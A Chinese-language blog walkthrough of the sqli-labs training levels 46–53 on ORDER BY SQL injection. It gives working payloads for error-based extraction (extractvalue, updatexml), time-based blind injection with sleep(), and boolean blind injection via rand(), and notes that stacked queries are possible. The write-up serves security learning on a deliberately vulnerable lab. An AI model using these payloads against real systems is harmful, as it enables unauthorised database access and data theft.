美文网首页
sqli-labs level46-53 order by注入

sqli-labs level46-53 order by注入

作者: z1挂东南 | 来源:发表于2019-08-05 16:31 被阅读0次

第四十六关

order by注入
注入点语句:$sql = "SELECT * FROM users ORDER BY $id";
这次的id在order by后面,用报错或者盲注都可以。报错和之前的报错注入写法一样。
数据库:?sort=1 and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

1.png

数据表:
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+

2.png

第四十七关

和46关做法一样,单引号闭合。

第四十八关

order by注入,盲注,整数型。

?sort=1 and 1=1 --+
?sort=1 and 1=2 --+

两个返回的页面一样,好像不能布尔盲注,我在网上看了一下发现可以用rand进行布尔盲注。
?sort=1 and sleep(3) --+
页面会有延时,可以使用时间盲注。

时间盲注:
数据库长度:?sort=1 and if((length((select database()))=8),sleep(3),0) --+
猜数据库名:?sort=1 and if((substr((select database()),1,1))='s',sleep(3),0) --+
布尔盲注:
?sort=rand(true) --+返回true页面:

3.png

?sort=rand(false) --+返回false页面:

4.png

数据表长度:
?sort=rand(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6) --+
猜数据表名:
?sort=rand(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e') --+

第四十九关

和48关一样也是盲注,单引号闭合就行了,可以时间盲注。
也可以导入导出文件注入,但是我没成功。

第五十关

和46关思路一样,整数型。加了mysqli_multi_query()函数,还可以进行堆叠注入。

第五十一关

和51关思路一样,单引号闭合,报错、盲注、堆叠都可以。

第五十二关

和48关一样,整数型,盲注或堆叠。

第五十三关

和49关一样,单引号闭合,时间盲注或堆叠。

相关文章

  • sqli-labs level46-53 order by注入

    第四十六关 order by注入注入点语句:$sql = "SELECT * FROM users ORDER B...

  • 搭建sqli-labs注入平台

    搭建SQL注入平台 docker搭建sqli-labs 运行sqli-labs 初始化数据库 访问sqli-labs

  • sqlmap的使用

    摘要:使用sqlmap注入本地搭建的sqli-labs过程记录 学习SQL 注入,一直在手注,关于工具的使用的学习...

  • Mysql手工注入

    整理一下手工注入笔记,以sqli-labs环境为例。 1.Mysql手工union联合查询注入 输入单引号,页面报...

  • 重新温习SQL注入:sqli-labs

    SQLi-Labs是一个专业的SQL注入练习平台,对SQL注入有些生疏了,近期打算拿它再练练手。 原始github...

  • 网络安全学习资源

    漏洞基础原理 SQL注入 sqli-labs 项目地址:https://github.com/Audi-1/sql...

  • updatexml注入和order by注入

    updatexml注入: http://www.mamicode.com/info-detail-1665678....

  • sql注入简单总结

    最近两周刷了一下sqli-labs,对sql注入有了一个基本的认识。这里写个总结。 1.sql注入原理简单介绍在一...

  • Sqli-Lab实验环境搭建

    介绍:Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程。也是我们用来练习sql注入的一个很...

  • SQL注入 order by后的注入(Less-46)

    常见注入虽然都是在用户id,帐号密码等地方进行注入,但有时也可能出现注入点在order by语句之后,如下图所示:...

网友评论

      本文标题:sqli-labs level46-53 order by注入

      本文链接:https://www.haomeiwen.com/subject/xkimdctx.html